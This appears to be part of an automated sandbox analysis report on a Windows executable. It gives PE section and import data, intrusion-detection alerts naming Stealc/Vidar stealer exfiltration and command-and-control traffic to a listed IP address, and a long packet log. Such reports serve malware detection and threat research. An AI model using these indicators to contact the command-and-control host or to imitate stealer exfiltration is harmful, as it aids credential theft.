                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                  .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                  .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                  .rsrc0x1000000x52ba0x5400b1edbe4e3b88b6484c11dd4114f0c003False0.7529761904761905data6.741237811431139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  .reloc0x1060000xfd60x1000ddad614c9dbc96c582c7870421c4d911False0.59765625data5.593601234467291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                  RT_ICON0x1001c00x2519PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001158260503317
                                                                                                                                                                                                                                                                                  RT_ICON0x1026dc0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5324450772986168
                                                                                                                                                                                                                                                                                  RT_DIALOG0x104d440x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                                  RT_DIALOG0x104e440x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                                  RT_DIALOG0x104f600x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x104fc00x22dataEnglishUnited States0.9705882352941176
                                                                                                                                                                                                                                                                                  RT_MANIFEST0x104fe40x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                  2024-12-23T06:21:24.647125+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.44974394.130.188.57443TCP
                                                                                                                                                                                                                                                                                  2024-12-23T06:21:29.220536+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.44974594.130.188.57443TCP
                                                                                                                                                                                                                                                                                  2024-12-23T06:21:29.220597+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config194.130.188.57443192.168.2.449745TCP
                                                                                                                                                                                                                                                                                  2024-12-23T06:21:31.758950+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1194.130.188.57443192.168.2.449746TCP
                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:01.717472076 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:17.282392979 CET49741443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:17.282447100 CET44349741149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:17.282511950 CET49741443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:17.303054094 CET49741443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:17.303101063 CET44349741149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:18.682297945 CET44349741149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:18.682394981 CET49741443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:18.730171919 CET49741443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:18.730241060 CET44349741149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:18.730668068 CET44349741149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:18.730736017 CET49741443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:18.734498024 CET49741443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:18.779335022 CET44349741149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.217109919 CET44349741149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.217180014 CET44349741149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.217221975 CET44349741149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.217343092 CET49741443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.217372894 CET44349741149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.217606068 CET49741443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.219532967 CET49741443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.219567060 CET44349741149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.635010004 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.635093927 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.635183096 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.635468006 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.635498047 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:21.468980074 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:21.469069004 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:21.472666979 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:21.472682953 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:21.473032951 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:21.473092079 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:21.473481894 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:21.519335985 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:22.147387981 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:22.147499084 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:22.147556067 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:22.147612095 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:22.147639990 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:22.147669077 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:22.150238991 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:22.150285006 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:22.152292013 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:22.152359009 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:22.152451038 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:22.152673960 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:22.152688980 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:23.553117037 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:23.553214073 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:23.725693941 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:23.725733995 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:23.780824900 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:23.780894041 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:24.647175074 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:24.647269011 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:24.647280931 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:24.647345066 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:24.647595882 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:24.647629976 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:24.649162054 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:24.649221897 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:24.649310112 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:24.649568081 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:24.649585009 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.050709009 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.050837040 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.051333904 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.051356077 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.052992105 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.053003073 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.930140972 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.930197001 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.930253029 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.930253983 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.930322886 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.930367947 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.930393934 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.930422068 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.930510998 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.930541992 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.931901932 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.931952953 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.932023048 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.932224035 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.932235956 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:28.332036972 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:28.332230091 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:28.332931995 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:28.332945108 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:28.338105917 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:28.338114023 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220355034 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220397949 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220429897 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220452070 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220464945 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220488071 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220509052 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220544100 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.262713909 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.262758017 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.464332104 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.464432955 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.464533091 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.474189043 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.474241972 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:30.871912956 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:30.871989965 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:30.872456074 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:30.872498035 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:30.874316931 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:30.874330044 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.758734941 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.758822918 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.758883953 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.759028912 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.759073973 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.759114981 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.779114008 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.779164076 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.779252052 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.779496908 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.779509068 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:32.767985106 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:32.768080950 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:32.768168926 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:32.768615961 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:32.768651962 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.178862095 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.178942919 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.179441929 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.179452896 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.181710958 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.181720972 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.181773901 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.181788921 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.170576096 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.170742989 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.171660900 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.171678066 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.173995972 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.174005985 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.183725119 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.183799982 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.184073925 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.184073925 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.184647083 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.184669971 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.149029970 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.149096966 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.149100065 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.149147987 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.149933100 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.149971962 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.927664042 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.927771091 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.927956104 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.928252935 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.928292990 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.482877016 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.482923985 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.483112097 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.483603954 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.483616114 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.746234894 CET49756443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.746341944 CET44349756142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.746421099 CET49756443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.746675968 CET49756443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.746705055 CET44349756142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.849275112 CET49757443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.849340916 CET44349757142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.849607944 CET49757443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.849832058 CET49757443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.849853992 CET44349757142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:37.623172045 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:37.623590946 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:37.623651981 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:37.625150919 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:37.625232935 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:37.626445055 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:37.626555920 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:37.626643896 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:37.669178009 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:37.669235945 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:37.716103077 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.174509048 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.175616980 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.175643921 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.177095890 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.177150011 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.177575111 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.177655935 CET44349755142.250.181.132192.168.2.4
